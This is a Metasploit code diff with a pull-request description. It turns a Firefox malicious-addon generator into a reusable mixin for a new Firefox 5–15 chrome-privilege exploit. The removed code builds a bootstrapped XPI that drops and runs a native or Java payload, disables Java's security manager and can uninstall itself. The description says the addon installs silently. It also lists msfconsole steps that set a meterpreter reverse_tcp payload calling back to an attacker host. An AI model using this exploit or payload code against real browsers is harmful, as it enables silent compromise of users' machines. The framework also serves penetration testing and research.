   def initialize( info = {} )
     super( update_info( info,
@@ -109,114 +110,9 @@ class Metasploit3 < Msf::Exploit::Remote
       return
     end
 
-    # If we haven't returned yet, then this is a request for our xpi,
-    # so build one
-
-    if target.name == 'Generic (Java Payload)'
-      jar = p.encoded_jar
-      jar.build_manifest(:main_class => "metasploit.Payload")
-      payload_file = jar.pack
-      payload_name='payload.jar'
-      payload_script=%q|
-  var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
-  java.lang.System.setSecurityManager(null);
-  var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
-  var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
-  m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
-      |
-    else
-      payload_file = generate_payload_exe
-      payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
-      payload_script=%q|
-  var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
-  process.init(tmp);
-  process.run(false,[],0);
-      |
-      if target.name != 'Windows x86 (Native Payload)'
-        payload_script = %q|
-        var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
-        chmod.initWithPath("/bin/chmod");
-        var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
-        process.init(chmod);
-        process.run(true, ["+x", tmp.path], 2);
-        | + payload_script
-      end
-    end
-
-    zip = Rex::Zip::Archive.new
-    xpi_guid = Rex::Text.rand_guid
-    bootstrap_script = %q|
-function startup(data, reason) {
-  var file = Components.classes["@mozilla.org/file/directory_service;1"].
-          getService(Components.interfaces.nsIProperties).
-          get("ProfD", Components.interfaces.nsIFile);
-  file.append("extensions");
-    |
-    bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
-    bootstrap_script << %Q|payload_name="#{payload_name}";|
-    bootstrap_script << %q|
-  file.append(xpi_guid);
-  file.append(payload_name);
-  var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
-          getService(Components.interfaces.nsIProperties).
-          get("TmpD", Components.interfaces.nsIFile);
-  tmp.append(payload_name);
-  tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
-  file.copyTo(tmp.parent, tmp.leafName);
-    |
-    bootstrap_script << payload_script
-
-    if (datastore['AutoUninstall'])
-      bootstrap_script <<  %q|
-  try { // Fx < 4.0
-    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
-  } catch (e) {}
-  try { // Fx 4.0 and later
-    Components.utils.import("resource://gre/modules/AddonManager.jsm");
-    AddonManager.getAddonByID(xpi_guid, function(addon) {
-      addon.uninstall();
-    });
-  } catch (e) {}
-      |
-    end
-
-    bootstrap_script << "}"
-
-    zip.add_file('bootstrap.js', bootstrap_script)
-    zip.add_file(payload_name, payload_file)
-    zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
-    zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
-<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
-  <Description about="urn:mozilla:install-manifest">
-    <em:id>#{xpi_guid}</em:id>
-    <em:name>#{datastore['ADDONNAME']}</em:name>
-    <em:version>1.0</em:version>
-    <em:bootstrap>true</em:bootstrap>
-    <em:unpack>true</em:unpack>
-    <em:targetApplication>
-      <Description>
-        <em:id>toolkit@mozilla.org</em:id>
-        <em:minVersion>1.0</em:minVersion>
-        <em:maxVersion>*</em:maxVersion>
-      </Description>
-    </em:targetApplication>
-    <em:targetApplication>
-      <Description>
-        <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
-        <em:minVersion>1.0</em:minVersion>
-        <em:maxVersion>*</em:maxVersion>
-      </Description>
-    </em:targetApplication>
-    </Description>
-</RDF>|)
-zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
-<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
-  <script src="bootstrap.js"/>
-  <script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
-</overlay>|)
 
     print_status("Sending xpi and waiting for user to click 'accept'...")
-    send_response( cli, zip.pack, { 'Content-Type' => 'application/x-xpinstall' } )
+    send_response( cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' } )
     handler( cli )
   end
 

--- a/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
+++ b/spec/lib/msf/core/exploit/remote/browser_exploit_server_spec.rb
@@ -64,19 +64,69 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
   end
 
   describe ".get_bad_requirements" do
-    it "should not contain any bad requirements" do
-        server.get_bad_requirements(expected_profile).should eq([])
+    let(:rejected_requirements) do
+      server.get_bad_requirements(fake_profile)
     end
 
-    it "should have identify :os_name as a requirement not met" do
-      fake_profile = {
-        "rMWwSAwBHLoESpHbEGbsv" => {
-          :os_name   => expected_os_name
-        }}
+    context 'when given the expected profile' do
+      it "should not contain any bad requirements" do
+        server.get_bad_requirements(expected_profile).should eq([])
+      end
+    end
 
-      server.instance_variable_set(:@requirements, {:os_name => /win/i})
-      baddies = server.get_bad_requirements(fake_profile)
-      baddies.should eq([:os_name])
+    context 'when attempting to match :os_name' do
+      let(:fake_profile) do
+        { :os_name => expected_os_name }
+      end
+
+      before do
+        server.instance_variable_set(:@requirements, {:os_name => /win/i})
+      end
+
+      it "should have identify :os_name as a requirement not met" do
+        rejected_requirements.should eq([:os_name])
+      end
+    end
+
+    context 'when attempting to match :ua_ver' do
+      context 'against version 25.0' do
+        let(:expected_ua_ver) { '25.0' }
+        let(:fake_profile) do
+          { :ua_ver => expected_ua_ver }
+        end
+
+        before do
+          server.instance_variable_set(:@requirements, {:ua_ver => ua_ver})
+        end
+
+        context "with the regex /26\.0$/" do
+          let(:ua_ver) { /26\.0$/ }
+          it "should reject :ua_ver" do
+            rejected_requirements.should include(:ua_ver)
+          end
+        end
+
+        context "with the regex /25\.0$/" do
+          let(:ua_ver) { /25\.0$/ }
+          it "should accept :ua_ver" do
+            rejected_requirements.should_not include(:ua_ver)
+          end
+        end
+
+        context "with a Proc that checks if version is between 1-5" do
+          let(:ua_ver) { lambda{ |ver| ver.to_i.between?(1, 5) } }
+          it "should reject :ua_ver" do
+            rejected_requirements.should include(:ua_ver)
+          end
+        end
+
+        context "with a Proc that checks if version is between 20-26" do
+          let(:ua_ver) { lambda{ |ver| ver.to_i.between?(20, 26) } }
+          it "should accept :ua_ver" do
+            rejected_requirements.should_not include(:ua_ver)
+          end
+        end
+      end
     end
   end
 


### PR DESCRIPTION
This PR adds a module for a firefox chrome privilege exploit for Firefox 5.0 - 15.0.1. It works by silently installing a malicious .xpi addon, no user interaction needed. To get this working, I had to refactor the `firefox_xpi_bootstrapped_addon` module into a mixin that generates a .xpi zip file.
### Verification
- [x] Test that the `firefox_xpi_bootstrapped_addon` module still works. Set your target/payload:
  
  ```
  msf> use exploits/remote/firefox_addon_generator
  msf> set TARGET 1
  msf> set payload windows/meterpreter/reverse_tcp
  msf> set lhost 10.6.0.111  (or whatever)
  msf> run
  ```
- [x] Ensure you can still get a session by visiting the URL in some version of firefox
- [x] Ensure you can get a session from a java target (`set TARGET 0`)
- [x] Test that the `firefox_proto_crmfrequest` module works on a few different versions of firefox:
  
  ```
  msf> use exploits/multi/browser/firefox_proto_crmfrequest
  msf> set TARGET 1
  msf> set payload windows/meterpreter/reverse_tcp
  msf> set lhost 10.6.0.111  (or whatever)
  msf> run
  ```
- [x] Works on windows Firefox 15.0.1
- [x] Works on windows Firefox 5
- [x] Works on osx Firefox 15.0.1 (you must `set TARGET 4` and `rerun`)
- [x] Works on linux Firefox 14.0.1 (you must `set TARGET 2` and `rerun`)
